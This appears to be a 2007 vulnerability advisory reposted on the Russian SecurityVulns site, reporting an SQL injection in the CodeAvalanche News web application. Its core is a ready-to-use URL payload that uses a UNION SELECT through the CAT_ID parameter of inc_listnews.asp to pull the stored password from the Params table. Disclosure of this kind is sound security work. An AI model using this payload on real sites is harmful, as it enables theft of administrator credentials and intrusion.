Информационная безопасность

Уведомление о безопасности: CodeAvalanche News SQL Injection
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability

  nabopoll 1.2 Remote Unprotected Admin Section Vulnerability

  nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability

  ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities

From:beks <beks_(at)_bsdmail.org>
Date:15 февраля 2007 г.
Subject:CodeAvalanche News SQL Injection

#CodeAvalanche News SQL Injection#

Software: CodeAvalanche News

Download: http://www.aspindir.com/indir.asp?id=3315

Risk: High

Found by: beks

http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,
Password+from+Params

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 


Rating@Mail.ru
test server